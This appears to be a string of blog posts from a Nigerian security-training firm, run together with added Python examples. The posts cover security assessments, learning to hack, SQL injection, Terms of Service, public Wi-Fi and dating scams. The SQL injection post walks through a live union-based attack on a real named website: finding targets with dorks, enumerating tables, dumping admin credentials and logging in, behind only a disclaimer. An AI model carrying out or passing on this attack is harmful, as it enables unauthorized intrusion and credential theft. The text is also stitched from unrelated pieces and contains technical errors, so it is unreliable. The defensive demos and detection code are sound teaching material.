5. Resolution: After a detailed report has been made, we must take all the discovered problems and develop solution plans for them. Above all, problems should be found and fixed. I have seen security reports whose findings were still unacknowledged and pending after a security assessment. There is an easy fix, which involves assigning responsibilities and ensuring that everyone is held accountable. The usual cycle for performing information security assessments spans from 6 months to a year, depending on the environment. An alternative is to follow up 30 to 45 days after the report is drafted by performing remediation validation of all the critical and highly prioritized findings.
6. Oversight: This involves keeping the security process going between security assessments, which will require things like tweaking existing systems and software and implementing new technical controls, together with the policies and processes. Instead of trying to achieve perfect security, your target should be to keep moving forward and achieve good security with a shorter time for catching flaws and resolving them. Management must be engaged in achieving this plan, with the executives kept on board regarding what is required for compliance and contractual obligations. Whether or not they are interested, the right people must be kept involved to make sure security is ensured. By doing this, return on investment is assured, which is essential for business growth. Note that security must not be out of mind; it is a priority.
As final words, the bottom line is that every business organisation has information and computing infrastructure that criminal hackers or malicious attackers are interested in for their own gain. Of course, you cannot be totally safe or immune from information risks and attacks, so you must know the value of information security assessments. I would advise organisations and businesses not to depend on IT security auditing and penetration testing to be safe. Neglecting IT security assessments is not a defensible option for due care. Furthermore, take time to properly plan and strategize how to perform the information security assessment, ensuring that the task is completed and that the proper staff members in IT, development, management and elsewhere are apprised of the findings so that the matter can be resolved.
Some security professionals and vendors will try to paint information security assessment as an exercise that is not difficult to perform and not very expensive, given its virtual return on investment. But I must tell you that your information security program will be a deep reflection of what you invest in it. That means that if you fail at it, you stand a huge chance of shutting down your infrastructure. So I will give you a quote from Warren Buffett, which says "you only have to do a very few things in your life so long as you don't do too many things wrong." Assessments are not, and never will be, the perfect solution to your security problems, even when they are performed periodically or consistently. The fact that you have tall fences, a big and strong gate and armed men does not guarantee your safety 100%. However, there is a high level of assurance that if you choose to ignore this exercise, history will surely repeat itself.
You can subscribe to our services at Soutech Ventures to get the security ideas you may require to carry out a detailed and successful information security assessment. You can also take our Ethical Hacking course from EC-Council, which is designed to educate you and give you hands-on knowledge of how to secure your infrastructure.
You are a beginner who wants to learn how to hack, but you are wondering where to start. If you are in this category, then I've got your back; you are definitely in the right place. As you may have noticed, most of the free books and resources on hacking that you find on the internet are written for people who already have some knowledge of the subject. These materials do not give a comprehensive picture of hacking.
This is why I have decided to post something for beginners and anyone who wants to start their journey into the hacking world. I am going to describe a few requirements and the basic things to do to make the journey a pleasant experience for you.
What is the Best way to Learn hacking as a beginner?
Here are a few steps. Let's go.
STEP 1: Start with the Basics
As usual, I advise beginners who have little or no knowledge of hacking to begin with the basics. Do not just learn how to hack anything; instead, start by exploring and researching IT topics such as computer networks, network services and common ports (FTP, TCP, SMTP, HTTP, HTTPS, DNS etc.), firewalls, common and widely used network protocols, and IP addresses. You can also learn how they work.
You may also learn about operating systems such as Linux, which is one of the basic operating systems used in the hacking environment. The more you know about the basic working principles of IT-related topics and concepts, the easier it becomes for you to find vulnerabilities and devise exploits. This will also go a long way to help you when applying your hacking techniques in practice. Hacking covers weaknesses or vulnerabilities in every field of IT, so you need a reasonably good background in the basics. So begin your research now.
Step 2: Get a reliable and good source to begin your learning
If you want a fair knowledge of basic hacking and of trending technologies in the IT field, there are books online and websites that can equip you technically. These books can also give you some technical background on vulnerabilities and possible ways to exploit them. However, it can be very difficult to find books and web resources that teach you how to hack from the basics in a simple and easy way.
For those with a fair amount of experience in the field of hacking, there are many books and websites that give technical information on the latest vulnerabilities along with possible ways to exploit them. However, for beginners it is hard to find sources that teach hacking right from the basics in a simple and easy-to-follow manner.
Step 3: Learn a programming Language (Optional)
Step 4: Enroll for an Ethical Hacking Course
One of the courses structured to give you excellent knowledge and skill in hacking is the EC-Council Certified Ethical Hacker (CEH) course. There are other courses in this line, such as CISSP, which is governed by another body. But CEH is a basic start if you want to learn about hacking and be well grounded. CEH v9 offers about 19 modules that are well structured to cover all the IT fields.
If you are in Nigeria, specifically in the cities of Abuja and Lagos, and you intend to take a CEH course, you can call us today at Soutech Ventures or visit our website, where you will find all the information you may need. We have experienced and certified tutors in this field who can teach you with a clear and simple breakdown of the concepts in the CEH syllabus. So be sure you have made the right choice in Soutech.
How Long does it take to be a Good Hacker?
I always tell my students that hacking cannot be mastered overnight and that the process must never be rushed. It is a field that requires in-depth knowledge, skill, creativity, dedication and a great deal of time. It may take anywhere from a few months to a few years to become skillful in hacking, depending on the time and effort you invest. In fact, everyone can become very skillful, but it depends on how they learn and the foundations they build. The foundation you give yourself matters a great deal; if it is lacking in a certain aspect, you will have trouble understanding and working on some technical details. So, if you want to become a good hacker, all you need is the passion to learn and a good source of knowledge that will help you understand the basics, together with some patience and perseverance.
What is SQL Injection?
SQL injection, often referred to as sequel-i or structured query language, is a malicious attempt on a website in which an attacker injects an SQL command (payload) into an SQL statement that controls the database of a web application. The web application can also be referred to as a Relational Database Management System (RDBMS), and it has a web input field.
SQL injection vulnerabilities have been known to damage websites or web apps that use an SQL-based database. SQLi has long been known as one of the lethal means of attacking websites, whereby an attacker attempts to exploit a web application. The attacker uses SQLi to bypass the authentication and authorization mechanisms of a web application and gain unauthorized access to it. After gaining access, the attacker or malicious user can delete, modify or update the database and make changes to columns or rows, depending on their intentions at the time. When this is done, the data integrity of the SQL-based database is compromised.
How Does SQL Injection work?
In order to exploit the web application, all the attacker has to do is find an input field whose value is embedded in the SQL query sent to the database. For an SQLi attack to take place, a vulnerable website must place user input directly into the SQL statement. The attacker then injects the payload, which is included in the SQL query and in turn used to launch the attack on the web server.
Before you launch any attack, you have to check the server to see how it responds to user input in its authentication mechanism. Use the following queries to verify the user's authentication mechanism:
// define POST variables
$Uname = $_POST['name'];
$Upassword = $_POST['password'];
// sql query vulnerable to SQLi: both values are placed in the statement unescaped
$sql = "SELECT id from users where username = '$Uname' && password = '$Upassword'";
// execute the sql query by database
The code above is vulnerable to SQL injection: the attacker can submit a malicious payload and gain access to the web application by altering the SQL statement that is executed.
One example of an SQL injection payload that can be set in the password field is
Password' OR '1'='1'
Because this condition is always true, the query that is run against the web server becomes
SELECT id FROM users WHERE username='username' AND password='password' OR 1=1'
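The following added example (not part of the original article) shows the same login query built by string concatenation next to its parameterized form, using Python's sqlite3 module with an in-memory database instead of the page's PHP and MySQL so that it runs anywhere. The table contents, function names and sample credentials are constructed for the illustration.

```python
import sqlite3

# Always-true password value of the kind discussed above (constructed sample);
# the application's own query text supplies the closing quote.
ALWAYS_TRUE = "Password' OR '1'='1"


def make_db():
    """Constructed sample data: one user in an in-memory database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    # Plaintext password only to mirror the page's query; real systems store salted hashes.
    conn.execute("INSERT INTO users (username, password) VALUES (?, ?)",
                 ("admin", "s3cret-sample"))
    return conn


def vulnerable_query(name, password):
    """The page's pattern: user input pasted straight into the SQL text."""
    return ("SELECT id FROM users WHERE username = '%s' AND password = '%s'"
            % (name, password))


def login_vulnerable(conn, name, password):
    """Returns a user id if the concatenated query yields any row."""
    row = conn.execute(vulnerable_query(name, password)).fetchone()
    return row[0] if row else None


def login_parameterized(conn, name, password):
    """Same query with placeholders: input is bound as data, never parsed as SQL."""
    row = conn.execute(
        "SELECT id FROM users WHERE username = ? AND password = ?",
        (name, password),
    ).fetchone()
    return row[0] if row else None


def leaks_syntax_error(conn, name):
    """True if a stray quote in the input breaks the concatenated statement."""
    try:
        login_vulnerable(conn, name, "x")
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("statement sent by the vulnerable code:")
    print("  " + vulnerable_query("nobody", ALWAYS_TRUE))
    print("vulnerable login result:   ", login_vulnerable(db, "nobody", ALWAYS_TRUE))
    print("parameterized login result:", login_parameterized(db, "nobody", ALWAYS_TRUE))
    print("stray quote breaks query:  ", leaks_syntax_error(db, "admin'"))
```

The parameterized version also accepts a username containing a quote without error, which removes the database syntax error that signals an injectable field.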
What can an attacker do with SQL?
SQL is a programming language used to work with relational database management systems. As I said earlier, SQL can be used to delete, modify or update databases, or the columns, rows and tables within RDBMS databases. SQL is a powerful language, and attackers can use it to exploit the databases of web applications, taking total charge of the application without the knowledge of the administrator.
Having said all this, let us see what an attacker can use SQLi to do.
- It can be used to bypass authentication mechanisms or to impersonate a specific user.
- It can be used by an attacker to delete records from a database. Even if an authorized backup plan is used, deleted data can affect the availability of an application until the database is restored.
- SQL can be used to select data based on a set of input queries and output the results. This could allow the disclosure of data residing on the web server.
- SQL can be used to alter or modify data in the database. When data is altered, its integrity is lost and repudiation issues can arise, such as voided transactions, altered balances and other altered records.
- Database servers can be configured to allow the arbitrary execution of operating system commands. When these conditions are present, a malicious user can use SQLi to bypass firewalls and penetrate the internal network.
Using SQL Injection to Hack a Website
Now let us see how we can use SQL injection to hack websites
The first thing is to search google for “google dorks”. I have gotten the following results from my search. You can as well search for yours.
This is just a few of the basic dorks that are available but you can also create your own dorks in order to find websites. These dorks can help you find out sites that are vulnerable to SQL injections in order to bypass the authentication.
Search google for SQL-vulnerable websites. Next thing is to open one of them to check if they can be vulnerable to SQLi’s.
I will use this website as an example.
Now after you choose your link, make sure it is different from mine because there are many available sites.
Please note, that this practical session is just for educational purposes and therefore I do not in any way take responsibility for your actions.
Now let's check if the site I have chosen is vulnerable to SQL or not. This can be done by putting this code behind the URL
.php?id=44 (You can copy and paste it with an apostrophe (‘) at the end of that code.
If after you do this and you get a result like this;
- “You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1.”
Then bingo, the site is vulnerable to an SQL injection attack. Therefore, we can go ahead to the next step.
In this step, we have to check the number of columns that are available on the database of the website. We can manually input these numbers, so we can check the columns;
http://www.tadspec.com/index.php?id=44 order by 32
Please note that the number “32” is an arbitrary number and it varies depending on the number of columns you may find. So, you have to make an arbitrary attempt to check the columns that are available on the database.
After putting “32”, this is what you get
Unknown column ‘32’ in ‘order clause’
And if we put the link below in URL,
http://www.tadspec.com/index.php?id=43 order by 31
This will redirect us to the website’s homepage which means that it is working correctly.
It therefore means that the number of the columns available on the database of this website is 31.
In this fourth step, we’re going to be determining the version of the database.
We will use the following query;
http://www.tadspec.com/index.php?id= null union all select 1,2,3,4,5,6,7,8,9,10,11-
When you run this query, you will get a number that shows boldly on your screen. Mine is 6. So, in the place of 6 in your URL, put @@version. This will give you the version of the SQL database that the website uses.
So, you have something like
http://www.tadspec.com/index.php?id= null union all select 1,2,3,4,5,@@version,7,8,9,10,11-
We will use the next query ‘group_concat(table_name)’ on the place of column#6 and some other string in the last part of the code.
So, it's going to be like this;
http://www.tadspec.com/index.php?id=null union all select 1,2,3,4,5,group_concat(table_name),7,8,9,10,11-from information_schema.tables where table_schema=database()-
Now the result of this query will be the names of the database tables. You can just copy them if you desire to use them for further analysis.
We will now try to find the column names in the database by changing the table to column in the fields.
http://www.tadspec.com/index.php?id= null union all select 1,2,3,4,5,group_concat(table_name),7,8,9,10,11-from information_schema.columns where table_schema=database()-
When you enter this query, the result you will get will be the names of the different tables that are present on this website.
Recall that in the previous step, we were able to get the names of the columns in the database so the next thing is to search for the column called “credential” because it can be used to retrieve sensitive data such as usernames and passwords. These are the columns that give access to the database.
Use this query to navigate there;
http://www.tadspec.com/index.php?id= null union all select 1,2,3,4,5,group_concat(username,0x3a,password),7,8,9,10,11-from admin-
The group_concat() method was used to pass the username and then the 0x3a which is used for space and then the other column name. We removed the query and wrote admin table at the end of it and it means we are using the column names from the admin table.
If you have succeeded in this, then Congratulations you successfully performed an SQL injection.
Go ahead search the website login page and input those credentials in the fields present.
Please note that this tutorial is strictly for Educational purposes. We at SOUTECH are not responsible for your actions.
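From the defender's side, each request in the walkthrough above leaves a recognisable trace in the web server's access log. The following added example (Python, not part of the original tutorial) scans constructed Common Log Format lines for those request patterns and groups them by client address; the rule names, sample paths and documentation-range IP addresses are assumptions made for the illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Common Log Format prefix: client, identity, user, [time], "METHOD target PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# One rule per request pattern shown in the walkthrough (rule names are hypothetical).
RULES = {
    "quote_probe": re.compile(r"^\s*\d+\s*'"),
    "order_by_enum": re.compile(r"\border\s+by\s+(\d+)", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\b", re.I),
    "group_concat": re.compile(r"\bgroup_concat\s*\(", re.I),
    "version_probe": re.compile(r"@@version", re.I),
}

# Constructed sample log lines; hosts and paths are placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Mar/2017:10:01:02 +0000] "GET /index.php?id=44%27 HTTP/1.1" 200 512',
    '192.0.2.10 - - [12/Mar/2017:10:01:09 +0000] "GET /index.php?id=44+order+by+32 HTTP/1.1" 200 310',
    '192.0.2.10 - - [12/Mar/2017:10:01:15 +0000] "GET /index.php?id=44%20order%20by%2031 HTTP/1.1" 200 9120',
    '192.0.2.10 - - [12/Mar/2017:10:02:01 +0000] "GET /index.php?id=null+union+all+select+1,2,3,4,5,@@version,7 HTTP/1.1" 200 9200',
    '192.0.2.10 - - [12/Mar/2017:10:02:30 +0000] "GET /index.php?id=null+union+all+select+1,2,group_concat(table_name),4+from+information_schema.tables HTTP/1.1" 200 9450',
    '198.51.100.7 - - [12/Mar/2017:10:03:00 +0000] "GET /index.php?id=44 HTTP/1.1" 200 9120',
    '198.51.100.7 - - [12/Mar/2017:10:03:05 +0000] "GET /search.php?q=order+by+price HTTP/1.1" 200 4000',
    '203.0.113.5 - - [12/Mar/2017:10:04:00 +0000] "GET /index.php?id=12%27 HTTP/1.1" 500 120',
]


def scan(lines):
    """Map client IP -> matched rule names and the ORDER BY indexes it tried."""
    report = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        # parse_qsl percent-decodes values and turns '+' into spaces.
        for _, value in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
            for name, rule in RULES.items():
                hit = rule.search(value)
                if not hit:
                    continue
                entry = report.setdefault(m["ip"], {"rules": set(), "order_by": set()})
                entry["rules"].add(name)
                if name == "order_by_enum":
                    entry["order_by"].add(int(hit.group(1)))
    return report


def alerts(report):
    """Escalate clients whose requests form a sequence, not a single odd value."""
    out = {}
    for ip, entry in report.items():
        reasons = []
        if len(entry["order_by"]) >= 2:
            reasons.append("column-count enumeration via ORDER BY")
        if "union_select" in entry["rules"] and entry["rules"] & {
            "schema_enum", "group_concat", "version_probe"
        }:
            reasons.append("UNION-based data extraction attempt")
        if reasons:
            out[ip] = reasons
    return out


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for ip, entry in sorted(found.items()):
        print(ip, sorted(entry["rules"]), sorted(entry["order_by"]))
    print(alerts(found))
```

A single quote probe is recorded but not escalated, since one odd value may be a typo; the repeated ORDER BY and UNION SELECT sequence from one address is what raises the alert.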
I have withheld some of the diagrams and pictorial explanations; if you want to learn about them, enroll in our CEH course to learn comprehensively about this topic and more. Call us today.
Some people have a habit of not reading the Terms of Service whenever they get a new application or buy a new device. This is a big mistake, because most of the apps available in the market, commonly known as grayware, rely on you to get access to your personal information. The developers know that a lot of people do not read the Terms of Service, so they often include language that authorizes a massive invasion of privacy. You may also have noticed that most Terms of Service are just boilerplate. So how do you read through a Terms of Service to find out what it says about privacy without wasting a lot of time on standard terminology?
What are Terms of Service?
The Terms of Service, commonly abbreviated as ToS, is a legal document used by websites and internet service providers (ISPs) that hold users' personal information, such as social networking services and e-commerce sites.
Elements of Terms of Service?
A typical ToS contains the following
- Definition of keywords and phrases and disambiguation.
- Rights and responsibilities of the User.
- Expected/proper usage or a potential misuse
- Accountability for all online actions, conducts and behaviour
- Details concerned with payments like membership or subscription fees etc
- Policies for opting out-detailed procedures for opting out.
- Arbitration carrying details of how the dispute is to be resolved and the extent of rights to take issues to court.
- Notification of the user whenever any modification is made.
There is a second problem you may come across while reading through the ToS: Terms of Service are usually written in legalese. This makes them somewhat difficult to understand, even for people who are in the habit of reading such documents.
- Access and Correction: This is the part that details who can access your data, who the data can be shared with, and under what circumstances.
- Consumer choice: It provides consumers with an opt-out option regarding the disclosure of their personal information to any unaffiliated third-party agent.
- A comprehensive list of the kinds of data required from you. Organizations have to collect certain information from you in order to make their products work for you, and they always have to tell you what type of data will be collected.
- A list of everyone they share information with and why they share it. The language here will generally be vague, such as "third parties".
But under what circumstances is your data collected from you? Do they only share it with companies that have security policies, and is it done in the course of a normal business transaction?
If there are no properly explained clauses as to who these third parties actually are and when they can share your personal data, this is a big warning signal for you.
- If you have any doubts, be sure to send an email to the provider's customer service with all your questions clearly outlined. Reputable organizations or companies will most likely answer all your questions promptly.
Sometimes the problem is not that the company does not want to answer your questions or that it intends to do something nefarious with your personal data. It might just be that it is not taking your internet security and privacy seriously enough. This kind of lax security can set both you and the company up for a major security breach.
As parting words, it is very important that you take a little time to read through license documents and terms of service. At least scroll through for a minute before checking the "I agree" box. Subscribe to our security course at SOUTECH Ventures, where you will be taught and equipped with the things you need to know in order to become security conscious. Call us today to get a certification in CEH.
Having Wi-Fi readily available in public places has become a trend in the larger cities of the world. Public places such as restaurants, coffee shops, libraries, hotel rooms, auxiliary offices, airports and other places you can think of have all adopted the use of Wi-Fi. Having a free and easily accessible internet connection can be a very convenient way of catching up with your work, meeting targets, accessing your online accounts, checking your mail and so on. However, we seem not to know the security risks associated with the use of publicly available Wi-Fi. As you already know, Wi-Fi is one of the best ways to quickly access your sensitive information and carry out sensitive transactions, so there are some additional measures you need to take in order to stay safe online, which is the purpose of this write-up.
According to a popular research journal published by Norton, over 68% of people fell victim to publicly available and unsecured Wi-Fi in the last year. Therefore, we must take practical measures to make sure our devices are kept safe and protected.
Brief History in the encryption standard adopted by the Wi-Fi
Let me shed some more light on the encryption protocols and standards that existed before the encryption protocol currently adopted for Wi-Fi. One of the problems with the older encryption standards adopted by some wireless networks is security. One of the first encryption schemes for wireless network devices was the Wireless Encryption Protocol (WEP), and this encryption standard was found to be weak and very easy to crack. Although WEP is still regularly found as an option in many wireless access points and devices, hardware should be upgraded to support newer standards whenever possible.
WEP was developed with the intention to manage the following;
- To prevent eavesdropping in communications which aims at reducing any forms of unauthorized disclosure of data.
- To ensure data integrity while it flows across the network.
- Encryption of packets during transmission using a shared secret key.
- To allow access control, confidentiality and integrity in a lightweight and efficient system.
However, WEP failed in handling some of these issues, which gave birth to WPA.
The Wireless Protected Access (WPA) came as a successor to WEP and was created with the intention of addressing the many issues faced by the WEP standard. Its encryption addressed some of those vulnerabilities; however, it too was found vulnerable and was cracked. It was designed not to require full hardware upgrades as compared to WEP.
However, its processing power and mechanisms were limited, especially where older hardware was involved. TKIP was one of the standards developed as a platform for WPA. TKIP was an improvement on the WEP protocol, because in WEP a static, unchanging key is used for every frame transmitted.
WPA, however, suffered from the following flaws:
- Weak key selection by users
- Packet spoofing issues
- Authentication issues related to the Microsoft Challenge Handshake.
This gave way to the WPA2 standard, intended to address the flaws in WPA. WPA2 came with stronger encryption standards, namely CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code Protocol) and AES (Advanced Encryption Standard). It also employs TKIP (Temporal Key Integrity Protocol) and MIC (Message Integrity Code) as encryption standards.
The enterprise version incorporates the EAP standard to strengthen security and to make the system scalable for use in large organisations and enterprises. WPA2 is special because it offers improved security over its predecessors and maintains the IEEE 802.11i standard for security. It uses a server to carry out key management and authentication for its wireless clients.
WEP, WPA and WPA2 all suffer from serious vulnerabilities which an attacker can exploit to take advantage of a victim. All of them have been shown to be exploitable in recent times.
Why Public Wi-Fi is Vulnerable to cyber attacks
Given the risks associated with all the protocols described above, users still suffer a great deal from known and unknown flaws. The fact that you need a password to access the Wi-Fi does not mean that your online activities are encrypted or that a publicly available Wi-Fi network is secure. There are a few issues that make public Wi-Fi susceptible to attacks. One relates to the encryption protocol which the Wi-Fi network adopts. Another is the possibility of connecting to a rogue Wi-Fi hotspot. Tools like Aircrack-ng are readily available online and can perform brute-force attacks on weak passwords and keys involving WEP and WPA.
The risk of joining a rogue Wi-Fi hotspot is also a big issue when using free public Wi-Fi. All a hacker has to do is create a rogue hotspot with the intention of launching a Man-in-the-middle (MITM) attack on whoever connects to it. When this attack occurs, it allows the hacker to intercept the communication between you and the server of the website you are visiting. There are pre-built tools for performing MITM attacks that can be used to easily eavesdrop, monitor online traffic and capture sensitive information such as login credentials, credit card numbers and social media passwords.
What are the signs that you may have logged on to a Rogue Wi-Fi?
As you may know, once a device discovers a Wi-Fi network it probes for its known networks, and an attacker can take advantage of this. An attacker can configure a rogue Wi-Fi hotspot that looks like a typical home network or one found in a coffee shop. Your device can then connect to the hacker's rogue hotspot instead of the real publicly available Wi-Fi hotspot.
Another trick you should know about is that a public Wi-Fi network can be created with a name like "Free Wi-Fi" to attract victims, and very naturally people will want to join such networks, especially if free internet service is offered. I must say I personally was a victim of this a few years ago. If you are at a coffee shop, at home or in a public place and your device suddenly shows that it has connected to your home network, there is a good chance that someone has been able to grab your device's or computer's broadcast request. Also, if you are browsing a website such as your bank or favorite social media page that should normally be HTTPS and it shows HTTP instead, then you must know that someone might have connected to your network. Once this person has linked up to your network, they can perform a MITM attack by serving you an HTTP version of the site with the intention of capturing your login credentials. So you must always be on the lookout for these little details.
What are the Measures you can take to ensure your safety on a Public Wi-Fi?
- Accessing sensitive information using public Wi-Fi: As a matter of fact, I will always advise anyone never to use public Wi-Fi to access sensitive information. If you need to access your sensitive data online at any point, switch to your local ISP or get someone to share their device hotspot with you. You can use public Wi-Fi for less sensitive things, like looking up directions or getting information from Google, Bing or Yahoo. If you're trying to pay bills or shop online, these things can wait. If it is an urgent situation, the use of a VPN (Virtual Private Network) is advised. There is a plethora of trusted VPNs online, and if you need a good service you will need to pay for it. Be sure to choose a reputable VPN provider.
- Use VPNs (Virtual Private Networks): If you need to use a publicly available Wi-Fi network to do your work and your company or organisation offers VPN access, make sure you use it. A VPN provides a private tunnel for your communication, adding an extra layer of security to your connection.
- Visit HTTPS only: If you are using public Wi-Fi, avoid websites that use HTTP (not protected or secure) and browse only websites whose addresses begin with HTTPS.
Why am I saying so? Whether you are an IT expert or not, you should know that HTTPS connections are encrypted and provide an extra layer of security, which makes browsing more secure. If you connect to an HTTP site, which is insecure, a hacker snooping around the network can easily see your traffic.
- Consider installing an extension such as HTTPS-Everywhere in order to re-route all the websites you visit to HTTPS. This tool is offered by the Electronic Frontier Foundation.
- Configure wireless settings on your device: Configure your device not to connect automatically to any available Wi-Fi hotspots. This can be done by navigating to the wireless settings of your PC or device. This setting makes sure your device does not automatically and unknowingly get connected to any public network. On your PC, just turn off the "connect automatically" option. When you do this, you prevent your device from broadcasting to the world that it is attempting to connect to the "home network", which a hacker can easily spoof.
- Use privacy screens: Hackers are everywhere and are usually not afraid of using any means possible to obtain your data, so consider using a privacy screen if you need to access sensitive information in a public place.
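An added example (not from the original article) of checking the auto-connect advice above on a Linux machine: it parses saved Wi-Fi profiles in NetworkManager's keyfile format and flags the ones a rogue hotspot could take advantage of. The profiles and SSIDs are constructed samples; on a real system these files live under /etc/NetworkManager/system-connections/.

```python
import configparser

# Constructed sample profiles in NetworkManager keyfile format (not from a real machine).
SAMPLE_PROFILES = {
    "Free Wi-Fi": """
[connection]
id=Free Wi-Fi
type=wifi

[wifi]
ssid=Free Wi-Fi
""",
    "HomeNet": """
[connection]
id=HomeNet
type=wifi
autoconnect=true

[wifi]
ssid=HomeNet

[wifi-security]
key-mgmt=wpa-psk
""",
    "OldRouter": """
[connection]
id=OldRouter
type=wifi
autoconnect=false

[wifi]
ssid=OldRouter

[wifi-security]
key-mgmt=none
""",
    "Office": """
[connection]
id=Office
type=wifi
autoconnect=false

[wifi]
ssid=Office

[wifi-security]
key-mgmt=wpa-eap
""",
}

# In NetworkManager, key-mgmt "none" is static WEP and "ieee8021x" is dynamic WEP.
WEAK_KEY_MGMT = {"none", "ieee8021x"}
# Current and legacy names of the Wi-Fi security section.
SEC_SECTIONS = ("wifi-security", "802-11-wireless-security")


def audit_profile(text):
    """Return a sorted list of risk flags for one saved connection profile."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    if cp.get("connection", "type", fallback="") not in ("wifi", "802-11-wireless"):
        return []  # not a Wi-Fi profile

    flags = set()
    sec = next((s for s in SEC_SECTIONS if cp.has_section(s)), None)
    if sec is None:
        # No security section: open network, nothing encrypted at the link layer.
        flags.add("open-network")
    elif cp.get(sec, "key-mgmt", fallback="") in WEAK_KEY_MGMT:
        flags.add("wep")

    # NetworkManager treats a missing autoconnect key as true.
    if cp.getboolean("connection", "autoconnect", fallback=True):
        # An open SSID has no credential to verify, so any access point
        # advertising the same name will be joined silently.
        flags.add("auto-join-spoofable" if "open-network" in flags else "auto-join")
    return sorted(flags)


def audit_all(profiles):
    """Map each profile name to its risk flags."""
    return {name: audit_profile(text) for name, text in profiles.items()}


if __name__ == "__main__":
    for name, flags in audit_all(SAMPLE_PROFILES).items():
        print(f"{name:12s} {', '.join(flags) or 'ok'}")
```

Profiles flagged `auto-join-spoofable` are the first ones to forget or set to manual connection.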
In general terms, whether you are using your smart devices or your PC, never access sensitive information such as your bank account and financial information over a publicly available Wi-Fi network. Consider all the tips above to keep your information protected online.
Soutech ventures offers comprehensive information security courses (such as CEH and CISSP) which can give more security insights, tools, tips and countermeasures in the different facets of technology. Subscribe to our services today.
In the past 3 years, Nigerian singles have flocked to dating sites and taken to social media to search for partners. Online dating has outgrown the stigma it used to have, as research by psychologists and counsellors has found that one out of ten Nigerian singles has turned to social media and online dating sites, on mobile apps and PCs, to get hooked up with people. Since the negative stigma attached to online dating has gradually been phased out and is nearly extinct, the popularity of these services has been on the rise and has caught the attention of hackers and scammers.
Recently in Nigeria, a lot of hackers and scammers have taken to social media platforms to trick people into giving out sensitive and personal information. I have made a personal study of this and read people's experiences, and it has become a concern for me, which is the reason behind this article. Apart from phishing scams and other vices that hackers have adopted to take advantage of unsuspecting victims, online dating has become one of the tools for playing on people's emotions in order to exploit them.
The intention of this article is not to talk about dating and online dating as such, but to give you tips on how to protect your privacy online.
Privacy Protection Tips
Creating of new user accounts
Create a username different from any other you have ever had or used. You may be wondering why you should do this. It is because a username, and any account related to it, can be searched for easily, which is why you need a totally different one.
Images and photos uploaded
The same applies to photos and the images that you post on your social media profiles. You should try as much as possible to make sure that any reverse image searches performed on you will not work.
Opening Email accounts
Be sure to set up a free email account with a unique name to use on the dating accounts. Note that most sites provide features that offer users anonymity protection via their own in-site messaging products.
Using Free Google voice accounts for Calls
If you must make a phone call, open a free Google Voice account, which will generate a different phone number for you, and then forward it to your mobile. By doing this, you keep your own phone number secure while having a number that is enough to give your potential match.
Use Reputable Online Dating sites
Always research properly and subscribe to popular and reputable online dating sites if you must use them. Some sites allow you to either delete or disable an account. And since the site retains your previous information, you can always return to the online dating site whenever you wish.
Check website privacy policies
Be sure to check the site's privacy policy and try to verify how your information is handled. Some of these sites by default make profiles and profile pictures public, which means they can easily be indexed by any search engine. There is a popular website that was penalized recently for secretly trying to experiment with its users' data.
The fact that users have to pay to use these services for communication has reduced the number of scammers and illegitimate daters. Note that some of these sites perform background screenings for criminals.
How can online dating scams be spotted?
Now that you know some of the do's and don'ts of online dating sites, I will show you how to spot the forms of scam that you may be exposed to.
- I have heard people say that someone came up to them with stories meant to get to their emotions. This is one popular trick by scammers: an individual can add you and start giving you sad stories like "I am stranded in a foreign country at the moment, my family has an emergency and needs immediate attention". The endpoint of this story is a request for some amount of money from you. Once you see this, immediately report such accounts to the service and do well to block them.
- Another trick I apply is to request a recent photo of the person I am chatting with in order to verify their identity. If they come up with excuses or start some sort of protest as to why they won't be able to provide the photo, the best thing to do is to run for safety and apply caution at once.
- If you have been chatting and getting familiar with a supposed sweetheart for some time and you observe that they avoid any real-life meetings and dates, this could be a warning signal to take note of.
- Do not open any links sent to you by anyone you have not been chatting or communicating with, or even by those you chat with frequently. A scammer can appear to be a contact and try to get you to click links which may redirect you to a pornographic site, a webcam site or even a malware-infected site.
- Be careful about your behavior and your outfit if you want to engage in any sort of webcam or video chat. A criminal will want to record these sorts of sessions in order to blackmail you with them. You can disconnect from any form of communication or chat session that makes you uncomfortable.
- Scammers use bots to create and run fake profiles with the aim of getting you to click links that redirect you to the unwanted sites described above. Some of them can even be programmed to steal your credit card information. You can easily spot a bot because bots are programmed to give out a set of predetermined responses. When you observe that you are not getting direct replies in your conversation, there is a chance that a bot is involved.
The term catfishing is a scamming trick in which a user takes the identity of another person. This scamming has been adopted by scammers and cyber criminals to lure people into online romantic relationships and friendships.
A typical catfisher will always come up with excuses as to why they can't go on dates, call you on the phone or even do video and webcam chats. If the user's profile appears too good to be true, it probably is a lie. What you can do is perform a reverse online image search of their photo, and if they appear to be in a place different from the one shown in their profile, then congratulations, you have caught a catfish.
As a parting word, we are in the age and era of the internet, where we can order just about anything online. And as there are scammers and tricksters in all facets of life, scammers and hackers are in strong search of loopholes to exploit online users. But I have done and will always do my bit to keep you apprised of all the techniques they can possibly come up with to trick you. All you have to do is follow all the tips I have given in this article and you can safely be online and keep your relationships going just fine.
Subscribing to our CEH course in Soutech ventures gives you an added edge to stay one step ahead of hackers and cyber criminals all over the world.
What is Social Engineering? Protect Yourself and Organization from all forms of Social Engineering-SOUTECH Nigeria
Esang U. E
Vulnerabilities in software have been widely discussed, and looking at the problem from the human perspective, human emotions play a large part. Anytime someone is faced with a scary or frightening scenario, their first reaction to it matters a whole lot.
Social engineers leverage this type of vulnerability to launch successful attacks on victims. I am going to discuss in detail what social engineering is all about and its different forms, as this particular vulnerability stands at 80% of the techniques with which cybercriminals perpetrate attacks.
What is Social Engineering?
